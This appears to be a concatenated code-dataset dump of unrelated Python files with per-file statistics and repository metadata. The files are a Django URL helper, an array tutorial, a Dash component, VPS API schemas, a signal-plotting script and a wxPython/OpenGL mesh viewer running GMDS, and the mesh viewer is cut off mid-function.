def govuk_url(path):
return urljoin(settings.GOVUK_PAY_URL, path)
def api_url(path):
return urljoin(settings.API_URL, path)
def site_url(path):
return urljoin(settings.SITE_URL, path)
def get_link_by_rel(data, rel):
if rel in data['_links']:
return data['_links'][rel]['href']
def make_response_cacheable(response):
"""
Allow response to be public and cached for an hour
"""
patch_cache_control(response, public=True, max_age=3600)
return response
class CacheableTemplateView(TemplateView):
"""
For simple pages whose content rarely changes so can be cached for an hour
"""
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
return make_response_cacheable(response)
| 30.659794 | 102 | 0.714526 | 791 | 5,948 | 5.166877 | 0.279393 | 0.024468 | 0.023978 | 0.020553 | 0.210179 | 0.158307 | 0.146562 | 0.146562 | 0.143871 | 0.143871 | 0 | 0.008482 | 0.18729 | 5,948 | 193 | 103 | 30.818653 | 0.836781 | 0.115669 | 0 | 0.130081 | 0 | 0.00813 | 0.07467 | 0.014352 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0.00813 | 0.138211 | 0.056911 | 0.552846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9136160d5624a0c97151f5a92ef4449fe0be2b28 | 1,951 | py | Python | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | import array as arr
a = arr.array('i', [ 1,2,3,4,5,6])
print(a)
# Accessing elements
print(a[2])
print(a[-2])
# BASIC ARRAY OPERATIONS
# Find length of array
print()
print('Length of array')
print(len(a))
# Adding elements to an array
# append() to add a single element at the end of an array
# extend() to add more than one element at the end of an array
# insert() to add an element at a specific position in an array
print()
# append
print('Append')
a.append(8)
print(a)
# extend
print()
print('Extend')
a.extend([9,8,6,5,4])
print(a)
# insert
print()
print('Insert')
a.insert(2,6) # first param is the index, second param is the value
print(a)
# Removing elements from an array
# pop() Remove an element and return it
# remove() Remove element with a specific value without returning it
print()
print(a)
# pop
print('pop')
print(a.pop()) # removes last element
print(a)
print(a.pop(2))
print(a)
print(a.pop(-1))
print(a)
# remove
print()
print('remove')
print(a.remove(8)) # doesn't return what it removes, it removes the first occurrence of '8'
print(a)
# Array Concatenation
print()
print('Array Concatenation')
b = arr.array('i', [1,2,3,4,5,6,7])
c = arr.array('i', [3,4,2,1,3,5,6,7,8])
d = arr.array('i')
d = b + c
print(d)
# Slicing an Array
print()
print('Slicing an Array') # This means fetching some particular values from an array
print(d)
print(d[0:5]) # Doesn't include the value on the right index
print(d[0:-2])
print(d[::-1]) # Reverse the array, this method is not preferred because it exhausts the memory
# Looping through an Array
print()
print('Looping through an Array')
print('Using for')
for x in d:
print(x, end=' ')
print()
for x in d[0:-3]:
print(x, end=' ')
print()
print('Using while')
temp = 0
while temp < d[2]:
print(d[temp], end = ' ')
temp = temp + 1 # Can use temp+=1, it's the same thing
print()
print(a)
tem = 0
while tem < len(a):
print(a[tem], end=' ')
tem += 1
print()
| 18.759615 | 95 | 0.664787 | 357 | 1,951 | 3.633053 | 0.282913 | 0.078643 | 0.046261 | 0.01542 | 0.123362 | 0.060139 | 0.060139 | 0.02313 | 0.02313 | 0 | 0 | 0.030492 | 0.17632 | 1,951 | 103 | 96 | 18.941748 | 0.776602 | 0.441312 | 0 | 0.402985 | 0 | 0 | 0.121583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.014925 | 0.746269 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
913cf201ceaa3cdf5791ad85165d65f001d7078a | 1,896 | py | Python | dash_carbon_components/Column.py | Matheus-Rangel/dash-carbon-components | e3f4aa4a8d649e2740db32677040f2548ef5da48 | [
"Apache-2.0"
] | 4 | 2021-04-25T22:55:25.000Z | 2021-12-10T04:52:30.000Z | dash_carbon_components/Column.py | Matheus-Rangel/dash-carbon-components | e3f4aa4a8d649e2740db32677040f2548ef5da48 | [
"Apache-2.0"
] | null | null | null | dash_carbon_components/Column.py | Matheus-Rangel/dash-carbon-components | e3f4aa4a8d649e2740db32677040f2548ef5da48 | [
"Apache-2.0"
] | null | null | null | # AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Column(Component):
"""A Column component.
Row Column
Keyword arguments:
- children (list of a list of or a singular dash component, string or numbers | a list of or a singular dash component, string or number; optional): The children of the element
- style (dict; optional): The inline styles
- id (string; optional): The ID of this component, used to identify dash components
in callbacks. The ID needs to be unique across all of the
components in an app.
- className (string; default ''): The class of the element
- columnSizes (list of strings; optional): The size of the column with the display size, sm-4, lg-16 ...
- offsetSizes (list of strings; optional): The size of the offset with the display size, lg-2 ..."""
@_explicitize_args
def __init__(self, children=None, style=Component.UNDEFINED, id=Component.UNDEFINED, className=Component.UNDEFINED, columnSizes=Component.UNDEFINED, offsetSizes=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'style', 'id', 'className', 'columnSizes', 'offsetSizes']
self._type = 'Column'
self._namespace = 'dash_carbon_components'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'style', 'id', 'className', 'columnSizes', 'offsetSizes']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Column, self).__init__(children=children, **args)
| 49.894737 | 196 | 0.681962 | 239 | 1,896 | 5.267782 | 0.39749 | 0.023828 | 0.01112 | 0.014297 | 0.193805 | 0.193805 | 0.193805 | 0.114376 | 0.061954 | 0.061954 | 0 | 0.002686 | 0.214662 | 1,896 | 37 | 197 | 51.243243 | 0.842848 | 0.396097 | 0 | 0 | 1 | 0 | 0.159051 | 0.019332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
913e527c83f21ed4118adbad50f5935916d3a9fa | 2,221 | py | Python | src/backend/schemas/vps.py | ddddhm1/LuWu | f9feaf10a6aca0dd31f250741a1c542ee5256633 | [
"Apache-2.0"
] | 658 | 2019-04-29T02:46:02.000Z | 2022-03-30T03:58:42.000Z | src/backend/schemas/vps.py | ddddhm1/LuWu | f9feaf10a6aca0dd31f250741a1c542ee5256633 | [
"Apache-2.0"
] | 9 | 2020-06-04T13:38:58.000Z | 2022-02-27T21:23:29.000Z | src/backend/schemas/vps.py | ddddhm1/LuWu | f9feaf10a6aca0dd31f250741a1c542ee5256633 | [
"Apache-2.0"
] | 130 | 2019-05-02T23:42:58.000Z | 2022-03-24T04:35:37.000Z | from typing import List
from typing import Optional
from typing import Union
from models.vps import VpsStatus
from schemas.base import APIModel
from schemas.base import BasePagination
from schemas.base import BaseSchema
from schemas.base import BaseSuccessfulResponseModel
class VpsSshKeySchema(APIModel):
name: str
public_key: str = None
private_key: str = None
isp_id: int
ssh_key_id: Optional[str]
date_created: Optional[str]
fingerprint: Optional[str]
class VpsSpecPlanSchema(APIModel):
name: str
plan_code: Union[str, int]
region_codes: List = None
bandwidth: float
ram: int
vcpu: int
disk: int
price_monthly: Union[float, int, str] = None
price_hourly: Union[float, int, str] = None
price_yearly: Union[float, int, str] = None
class VpsSpecRegionSchema(APIModel):
name: str
region_code: Union[str, int]
features: List[str] = None
plan_codes: List[Union[str, int]] = []
class VpsSpecOsSchema(APIModel):
name: str
os_code: Union[str, int]
region_codes: List[Union[str, int]] = []
plan_codes: List[Union[str, int]] = []
class VpsSpecSchema(APIModel):
region: List[VpsSpecRegionSchema] = []
plan: List[VpsSpecPlanSchema] = []
os: List[VpsSpecOsSchema] = []
class VpsSpecResponse(BaseSuccessfulResponseModel):
result: VpsSpecSchema
class VpsCreateSchema(APIModel):
hostname: str
isp_id: int
region_code: str
os_code: str
plan_code: str
ssh_keys: List[str] = []
status: int = VpsStatus.init
remark: str = None
class VpsItemSchema(BaseSchema):
isp_id: int
ip: Union[int, str, None]
server_id: Optional[str]
hostname: str
os: Optional[str]
plan: Optional[str]
region: Optional[str]
status: int
status_name: str
status_msg: Optional[str]
isp_provider_name: str
class VpsItemResponse(BaseSuccessfulResponseModel):
result: VpsItemSchema
class VpsPaginationSchema(BasePagination):
items: Optional[List[VpsItemSchema]]
class VpsPaginationResponse(BaseSuccessfulResponseModel):
result: VpsPaginationSchema
class VpsSshKeyResponseSchema(BaseSuccessfulResponseModel):
result: List[VpsSshKeySchema]
| 22.663265 | 59 | 0.714093 | 257 | 2,221 | 6.066148 | 0.2607 | 0.03592 | 0.042335 | 0.053881 | 0.127646 | 0.107761 | 0.07569 | 0 | 0 | 0 | 0 | 0 | 0.197659 | 2,221 | 97 | 60 | 22.896907 | 0.87486 | 0 | 0 | 0.152778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 1 | 0.013889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
913effe79b3a41e71c6774354a20673cc5bf2cf7 | 672 | py | Python | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | import sigplot as sp
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
matplotlib.rcParams['toolbar'] = 'None'
plt.style.use('dark_background')
fig = plt.figure()
# seed = np.linspace(3, 7, 1000)
# a = (np.sin(2 * np.pi * seed))
# b = (np.cos(2 * np.pi * seed))
# sp.correlate(fig, b, a, 300)
t = np.linspace(0, 1, 500)
b = (np.cos(2 * np.pi * t))
# x = np.concatenate([np.zeros(500), signal.sawtooth(2 * np.pi * 5 * t), np.zeros(500), np.ones(120), np.zeros(500)])
x = np.concatenate([np.zeros(500), np.ones(500), np.zeros(500)])
sp.fourier_series(fig, x, 100, 200, 200)
plt.show()
# WriteToVideo("twoPulse.mp4", anim);
| 25.846154 | 118 | 0.623512 | 114 | 672 | 3.657895 | 0.45614 | 0.083933 | 0.119904 | 0.043165 | 0.220624 | 0.167866 | 0 | 0 | 0 | 0 | 0 | 0.09058 | 0.178571 | 672 | 25 | 119 | 26.88 | 0.664855 | 0.40625 | 0 | 0 | 0 | 0 | 0.070845 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9143774e616443b37cd584d3970647098c72f10f | 16,563 | py | Python | testGMDS.py | ctralie/SiRPyGL | e06c317ed60321d492725e39fd8fcc0ce56ff4c0 | [
"Apache-2.0"
] | 7 | 2017-10-06T05:33:28.000Z | 2021-04-20T20:06:53.000Z | testGMDS.py | ctralie/SiRPyGL | e06c317ed60321d492725e39fd8fcc0ce56ff4c0 | [
"Apache-2.0"
] | null | null | null | testGMDS.py | ctralie/SiRPyGL | e06c317ed60321d492725e39fd8fcc0ce56ff4c0 | [
"Apache-2.0"
] | 4 | 2015-03-20T13:14:36.000Z | 2019-04-19T10:34:51.000Z | #Based off of http://wiki.wxpython.org/GLCanvas
#Lots of help from http://wiki.wxpython.org/Getting%20Started
from OpenGL.GL import *
import wx
from wx import glcanvas
from Primitives3D import *
from PolyMesh import *
from LaplacianMesh import *
from Geodesics import *
from PointCloud import *
from Cameras3D import *
from ICP import *
from sys import exit, argv
import random
import numpy as np
import scipy.io as sio
from pylab import cm
import os
import subprocess
import math
import time
from sklearn import manifold
from GMDS import *
DEFAULT_SIZE = wx.Size(1200, 800)
DEFAULT_POS = wx.Point(10, 10)
PRINCIPAL_AXES_SCALEFACTOR = 1
def saveImageGL(mvcanvas, filename):
view = glGetIntegerv(GL_VIEWPORT)
img = wx.EmptyImage(view[2], view[3] )
pixels = glReadPixels(0, 0, view[2], view[3], GL_RGB,
GL_UNSIGNED_BYTE)
img.SetData( pixels )
img = img.Mirror(False)
img.SaveFile(filename, wx.BITMAP_TYPE_PNG)
def saveImage(canvas, filename):
s = wx.ScreenDC()
w, h = canvas.size.Get()
b = wx.EmptyBitmap(w, h)
m = wx.MemoryDCFromDC(s)
m.SelectObject(b)
m.Blit(0, 0, w, h, s, 70, 0)
m.SelectObject(wx.NullBitmap)
b.SaveFile(filename, wx.BITMAP_TYPE_PNG)
class MeshViewerCanvas(glcanvas.GLCanvas):
def __init__(self, parent):
attribs = (glcanvas.WX_GL_RGBA, glcanvas.WX_GL_DOUBLEBUFFER, glcanvas.WX_GL_DEPTH_SIZE, 24)
glcanvas.GLCanvas.__init__(self, parent, -1, attribList = attribs)
self.context = glcanvas.GLContext(self)
self.parent = parent
#Camera state variables
self.size = self.GetClientSize()
#self.camera = MouseSphericalCamera(self.size.x, self.size.y)
self.camera = MousePolarCamera(self.size.width, self.size.height)
#Main state variables
self.MousePos = [0, 0]
self.initiallyResized = False
self.bbox = BBox3D()
self.unionbbox = BBox3D()
random.seed()
#Face mesh variables and manipulation variables
self.mesh1 = None
self.mesh1Dist = None
self.mesh1DistLoaded = False
self.mesh2 = None
self.mesh2DistLoaded = False
self.mesh2Dist = None
self.mesh3 = None
#Holds the transformations of the best iteration in ICP
self.transformations = []
self.savingMovie = False
self.movieIter = 0
self.displayMeshFaces = True
self.displayMeshEdges = False
self.displayMeshVertices = False
self.displayMeshNormals = False
self.displayPrincipalAxes = False
self.vertexColors = np.zeros(0)
self.cutPlane = None
self.displayCutPlane = False
self.GLinitialized = False
#GL-related events
wx.EVT_ERASE_BACKGROUND(self, self.processEraseBackgroundEvent)
wx.EVT_SIZE(self, self.processSizeEvent)
wx.EVT_PAINT(self, self.processPaintEvent)
#Mouse Events
wx.EVT_LEFT_DOWN(self, self.MouseDown)
wx.EVT_LEFT_UP(self, self.MouseUp)
wx.EVT_RIGHT_DOWN(self, self.MouseDown)
wx.EVT_RIGHT_UP(self, self.MouseUp)
wx.EVT_MIDDLE_DOWN(self, self.MouseDown)
wx.EVT_MIDDLE_UP(self, self.MouseUp)
wx.EVT_MOTION(self, self.MouseMotion)
#self.initGL()
def initPointCloud(self, pointCloud):
self.pointCloud = pointCloud
def centerOnMesh1(self, evt):
if not self.mesh1:
return
self.bbox = self.mesh1.getBBox()
self.camera.centerOnBBox(self.bbox, theta = -math.pi/2, phi = math.pi/2)
self.Refresh()
def centerOnMesh2(self, evt):
if not self.mesh2:
return
self.bbox = self.mesh2.getBBox()
self.camera.centerOnBBox(self.bbox, theta = -math.pi/2, phi = math.pi/2)
self.Refresh()
def centerOnBoth(self, evt):
if not self.mesh1 or not self.mesh2:
return
self.bbox = self.mesh1.getBBox()
self.bbox.Union(self.mesh2.getBBox())
self.camera.centerOnBBox(self.bbox, theta = -math.pi/2, phi = math.pi/2)
self.Refresh()
def MDSMesh1(self, evt):
if not self.mesh1:
print "ERROR: Mesh 1 not loaded yet"
return
if not self.mesh1DistLoaded:
print "ERROR: Mesh 1 distance matrix not loaded"
return
        mds = manifold.MDS(n_components=3, dissimilarity="precomputed", n_jobs=1)
print "Doing MDS on mesh 1...."
pos = mds.fit(self.mesh1Dist).embedding_
print "Finished MDS on mesh 1"
for i in range(pos.shape[0]):
self.mesh1.vertices[i].pos = Point3D(pos[i, 0], pos[i, 1], pos[i, 2])
self.mesh1.needsDisplayUpdate = True
self.Refresh()
def MDSMesh2(self, evt):
if not self.mesh2:
print "ERROR: Mesh 2 not loaded yet"
return
if not self.mesh2DistLoaded:
print "ERROR: Mesh 2 distance matrix not loaded"
return
        mds = manifold.MDS(n_components=3, dissimilarity="precomputed", n_jobs=1)
print "Doing MDS on mesh 2..."
pos = mds.fit(self.mesh2Dist).embedding_
print "Finished MDS on mesh 2"
for i in range(pos.shape[0]):
self.mesh2.vertices[i].pos = Point3D(pos[i, 0], pos[i, 1], pos[i, 2])
self.mesh2.needsDisplayUpdate = True
self.Refresh()
def doGMDS(self, evt):
if self.mesh1 and self.mesh2:
if not self.mesh1DistLoaded:
print "Mesh 1 distance not loaded"
return
if not self.mesh2DistLoaded:
print "Mesh 2 distance not loaded"
return
N = len(self.mesh1.vertices)
VX = np.zeros((N, 3))
for i in range(N):
V = self.mesh1.vertices[i].pos
VX[i, :] = np.array([V.x, V.y, V.z])
print "Doing GMDS..."
t, u = GMDSPointsToMesh(VX, self.mesh1Dist, self.mesh2, self.mesh2Dist)
print "Finished GMDS"
#Update the vertices based on the triangles where they landed
#and the barycentric coordinates of those triangles
for i in range(N):
Vs = [v.pos for v in self.mesh2.faces[int(t[i].flatten()[0])].getVertices()]
pos = Point3D(0, 0, 0)
for k in range(3):
pos = pos + u[i, k]*Vs[k]
self.mesh1.vertices[i].pos = pos
self.mesh1.needsDisplayUpdate = True
else:
print "ERROR: One or both meshes have not been loaded yet"
self.Refresh()
def displayMeshFacesCheckbox(self, evt):
self.displayMeshFaces = evt.Checked()
self.Refresh()
def displayMeshEdgesCheckbox(self, evt):
self.displayMeshEdges = evt.Checked()
self.Refresh()
def displayCutPlaneCheckbox(self, evt):
self.displayCutPlane = evt.Checked()
self.Refresh()
def displayMeshVerticesCheckbox(self, evt):
self.displayMeshVertices = evt.Checked()
self.Refresh()
def displayPrincipalAxesCheckbox(self, evt):
self.displayPrincipalAxes = evt.Checked()
self.Refresh()
def processEraseBackgroundEvent(self, event): pass #avoid flashing on MSW.
def processSizeEvent(self, event):
self.size = self.GetClientSize()
self.SetCurrent(self.context)
glViewport(0, 0, self.size.width, self.size.height)
if not self.initiallyResized:
#The canvas gets resized once on initialization so the camera needs
#to be updated accordingly at that point
self.camera = MousePolarCamera(self.size.width, self.size.height)
self.camera.centerOnBBox(self.bbox, math.pi/2, math.pi/2)
self.initiallyResized = True
def processPaintEvent(self, event):
dc = wx.PaintDC(self)
self.SetCurrent(self.context)
if not self.GLinitialized:
self.initGL()
self.GLinitialized = True
self.repaint()
def repaint(self):
#Set up projection matrix
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
farDist = (self.camera.eye - self.bbox.getCenter()).Length()*2
#This is to make sure we can see on the inside
farDist = max(farDist, self.unionbbox.getDiagLength()*2)
nearDist = farDist/50.0
gluPerspective(180.0*self.camera.yfov/M_PI, float(self.size.x)/self.size.y, nearDist, farDist)
#Set up modelview matrix
self.camera.gotoCameraFrame()
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLightfv(GL_LIGHT0, GL_POSITION, [3.0, 4.0, 5.0, 0.0]);
glLightfv(GL_LIGHT1, GL_POSITION, [-3.0, -2.0, -3.0, 0.0]);
glEnable(GL_LIGHTING)
glMaterialfv(GL_FRONT_AND_BACK, GL_AMBIENT_AND_DIFFUSE, [0.8, 0.8, 0.8, 1.0]);
glMaterialfv(GL_FRONT_AND_BACK, GL_SPECULAR, [0.2, 0.2, 0.2, 1.0])
glMaterialfv(GL_FRONT_AND_BACK, GL_SHININESS, 64)
if self.mesh1:
self.mesh1.renderGL(True, True, False, False, None)
if self.mesh2:
self.mesh2.renderGL(self.displayMeshEdges, self.displayMeshVertices, self.displayMeshNormals, self.displayMeshFaces, None)
self.SwapBuffers()
def initGL(self):
glLightModelfv(GL_LIGHT_MODEL_AMBIENT, [0.2, 0.2, 0.2, 1.0])
glLightModeli(GL_LIGHT_MODEL_LOCAL_VIEWER, GL_TRUE)
glLightfv(GL_LIGHT0, GL_DIFFUSE, [1.0, 1.0, 1.0, 1.0])
glEnable(GL_LIGHT0)
glLightfv(GL_LIGHT1, GL_DIFFUSE, [0.5, 0.5, 0.5, 1.0])
glEnable(GL_LIGHT1)
glEnable(GL_NORMALIZE)
glEnable(GL_LIGHTING)
glEnable(GL_DEPTH_TEST)
def handleMouseStuff(self, x, y):
#Invert y from what the window manager says
y = self.size.height - y
self.MousePos = [x, y]
def MouseDown(self, evt):
x, y = evt.GetPosition()
self.CaptureMouse()
self.handleMouseStuff(x, y)
self.Refresh()
def MouseUp(self, evt):
x, y = evt.GetPosition()
self.handleMouseStuff(x, y)
self.ReleaseMouse()
self.Refresh()
def MouseMotion(self, evt):
x, y = evt.GetPosition()
[lastX, lastY] = self.MousePos
self.handleMouseStuff(x, y)
dX = self.MousePos[0] - lastX
dY = self.MousePos[1] - lastY
if evt.Dragging():
if evt.MiddleIsDown():
self.camera.translate(dX, dY)
elif evt.RightIsDown():
self.camera.zoom(-dY)#Want to zoom in as the mouse goes up
elif evt.LeftIsDown():
self.camera.orbitLeftRight(dX)
self.camera.orbitUpDown(dY)
self.Refresh()
class MeshViewerFrame(wx.Frame):
(ID_LOADDATASET1, ID_LOADDATASET2, ID_SAVEDATASET, ID_SAVESCREENSHOT) = (1, 2, 3, 4)
def __init__(self, parent, id, title, pos=DEFAULT_POS, size=DEFAULT_SIZE, style=wx.DEFAULT_FRAME_STYLE, name = 'GLWindow', mesh1 = None, mesh2 = None):
style = style | wx.NO_FULL_REPAINT_ON_RESIZE
super(MeshViewerFrame, self).__init__(parent, id, title, pos, size, style, name)
#Initialize the menu
self.CreateStatusBar()
self.size = size
self.pos = pos
print "MeshViewerFrameSize = %s, pos = %s"%(self.size, self.pos)
filemenu = wx.Menu()
menuOpenMesh1 = filemenu.Append(MeshViewerFrame.ID_LOADDATASET1, "&Load Mesh1","Load a polygon mesh")
self.Bind(wx.EVT_MENU, self.OnLoadMesh1, menuOpenMesh1)
menuOpenMesh2 = filemenu.Append(MeshViewerFrame.ID_LOADDATASET2, "&Load Mesh2","Load a polygon mesh")
self.Bind(wx.EVT_MENU, self.OnLoadMesh2, menuOpenMesh2)
menuSaveScreenshot = filemenu.Append(MeshViewerFrame.ID_SAVESCREENSHOT, "&Save Screenshot", "Save a screenshot of the GL Canvas")
self.Bind(wx.EVT_MENU, self.OnSaveScreenshot, menuSaveScreenshot)
menuExit = filemenu.Append(wx.ID_EXIT,"E&xit"," Terminate the program")
self.Bind(wx.EVT_MENU, self.OnExit, menuExit)
# Creating the menubar.
menuBar = wx.MenuBar()
menuBar.Append(filemenu,"&File") # Adding the "filemenu" to the MenuBar
self.SetMenuBar(menuBar) # Adding the MenuBar to the Frame content.
self.glcanvas = MeshViewerCanvas(self)
self.glcanvas.mesh1 = None
self.glcanvas.mesh2 = None
if mesh1:
(self.glcanvas.mesh1, self.glcanvas.mesh1Dist) = self.loadMesh(mesh1)
if self.glcanvas.mesh1Dist.shape[0] > 0:
self.glcanvas.mesh1DistLoaded = True
else:
self.glcanvas.mesh1DistLoaded = False
if mesh2:
(self.glcanvas.mesh2, self.glcanvas.mesh2Dist) = self.loadMesh(mesh2)
if self.glcanvas.mesh2Dist.shape[0] > 0:
self.glcanvas.mesh2DistLoaded = True
else:
self.glcanvas.mesh2DistLoaded = False
self.rightPanel = wx.BoxSizer(wx.VERTICAL)
#Buttons to go to a default view
viewPanel = wx.BoxSizer(wx.HORIZONTAL)
center1Button = wx.Button(self, -1, "Mesh1")
self.Bind(wx.EVT_BUTTON, self.glcanvas.centerOnMesh1, center1Button)
viewPanel.Add(center1Button, 0, wx.EXPAND)
center2Button = wx.Button(self, -1, "Mesh2")
self.Bind(wx.EVT_BUTTON, self.glcanvas.centerOnMesh2, center2Button)
viewPanel.Add(center2Button, 0, wx.EXPAND)
bothButton = wx.Button(self, -1, "Both")
self.Bind(wx.EVT_BUTTON, self.glcanvas.centerOnBoth, bothButton)
viewPanel.Add(bothButton, 0, wx.EXPAND)
self.rightPanel.Add(wx.StaticText(self, label="Views"), 0, wx.EXPAND)
self.rightPanel.Add(viewPanel, 0, wx.EXPAND)
#Buttons for MDS
MDSPanel = wx.BoxSizer(wx.HORIZONTAL)
MDS1Button = wx.Button(self, -1, "MDS Mesh1")
self.Bind(wx.EVT_BUTTON, self.glcanvas.MDSMesh1, MDS1Button)
MDSPanel.Add(MDS1Button, 0, wx.EXPAND)
MDS2Button = wx.Button(self, -1, "MDS Mesh2")
self.Bind(wx.EVT_BUTTON, self.glcanvas.MDSMesh2, MDS2Button)
MDSPanel.Add(MDS2Button, 0, wx.EXPAND)
self.rightPanel.Add(wx.StaticText(self, label="MDS on Meshes"), 0, wx.EXPAND)
self.rightPanel.Add(MDSPanel, 0, wx.EXPAND)
#Checkboxes for displaying data
self.displayMeshFacesCheckbox = wx.CheckBox(self, label = "Display Mesh Faces")
self.displayMeshFacesCheckbox.SetValue(True)
self.Bind(wx.EVT_CHECKBOX, self.glcanvas.displayMeshFacesCheckbox, self.displayMeshFacesCheckbox)
self.rightPanel.Add(self.displayMeshFacesCheckbox, 0, wx.EXPAND)
self.displayMeshEdgesCheckbox = wx.CheckBox(self, label = "Display Mesh Edges")
self.displayMeshEdgesCheckbox.SetValue(False)
self.Bind(wx.EVT_CHECKBOX, self.glcanvas.displayMeshEdgesCheckbox, self.displayMeshEdgesCheckbox)
self.rightPanel.Add(self.displayMeshEdgesCheckbox, 0, wx.EXPAND)
self.displayMeshVerticesCheckbox = wx.CheckBox(self, label = "Display Mesh Points")
self.displayMeshVerticesCheckbox.SetValue(False)
self.Bind(wx.EVT_CHECKBOX, self.glcanvas.displayMeshVerticesCheckbox, self.displayMeshVerticesCheckbox)
self.rightPanel.Add(self.displayMeshVerticesCheckbox)
#Button for doing ICP
GMDSButton = wx.Button(self, -1, "DO GMDS")
self.Bind(wx.EVT_BUTTON, self.glcanvas.doGMDS, GMDSButton)
self.rightPanel.Add(GMDSButton, 0, wx.EXPAND)
#Finally add the two main panels to the sizer
self.sizer = wx.BoxSizer(wx.HORIZONTAL)
self.sizer.Add(self.glcanvas, 2, wx.EXPAND)
self.sizer.Add(self.rightPanel, 0, wx.EXPAND)
self.SetSizer(self.sizer)
self.Layout()
self.Show()
def loadMesh(self, filepath):
print "Loading mesh %s..."%filepath
mesh = LaplacianMesh()
mesh.loadFile(filepath)
print "Finished loading mesh 1\n %s"%mesh
#Now try to load in the distance matrix
fileName, fileExtension = os.path.splitext(filepath)
matfile = sio.loadmat("%s.mat"%fileName)
D = np.array([])
if 'D' in matfile:
D = matfile['D']
else:
print "ERROR: No distance matrix found for mesh %s"%filepath
return (mesh, D)
def OnLoadMesh1(self, evt):
dlg = wx.FileDialog(self, "Choose a file", ".", "", "OBJ files (*.obj)|*.obj|OFF files (*.off)|*.off", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetFilename()
dirname = dlg.GetDirectory()
filepath = os.path.join(dirname, filename)
print dirname
(self.glcanvas.mesh1, self.glcanvas.mesh1Dist) = self.loadMesh(filepath)
self.glcanvas.bbox = self.glcanvas.mesh1.getBBox()
print "Mesh BBox: %s\n"%self.glcanvas.bbox
self.glcanvas.camera.centerOnBBox(self.glcanvas.bbox, theta = -math.pi/2, phi = math.pi/2)
#Now try to load in the distance matrix
if self.glcanvas.mesh1Dist.shape[0] > 0:
self.glcanvas.mesh1DistLoaded = True
self.glcanvas.Refresh()
dlg.Destroy()
return
def OnLoadMesh2(self, evt):
dlg = wx.FileDialog(self, "Choose a file", ".", "", "OBJ files (*.obj)|*.obj|OFF files (*.off)|*.off", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetFilename()
dirname = dlg.GetDirectory()
filepath = os.path.join(dirname, filename)
print dirname
(self.glcanvas.mesh2, self.glcanvas.mesh2Dist) = self.loadMesh(filepath)
self.glcanvas.bbox = self.glcanvas.mesh2.getBBox()
print "Mesh BBox: %s\n"%self.glcanvas.bbox
self.glcanvas.camera.centerOnBBox(self.glcanvas.bbox, theta = -math.pi/2, phi = math.pi/2)
#Now try to load in the distance matrix
if self.glcanvas.mesh2Dist.shape[0] > 0:
self.glcanvas.mesh2DistLoaded = True
self.glcanvas.Refresh()
dlg.Destroy()
return
def OnSaveScreenshot(self, evt):
dlg = wx.FileDialog(self, "Choose a file", ".", "", "*", wx.SAVE)
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetFilename()
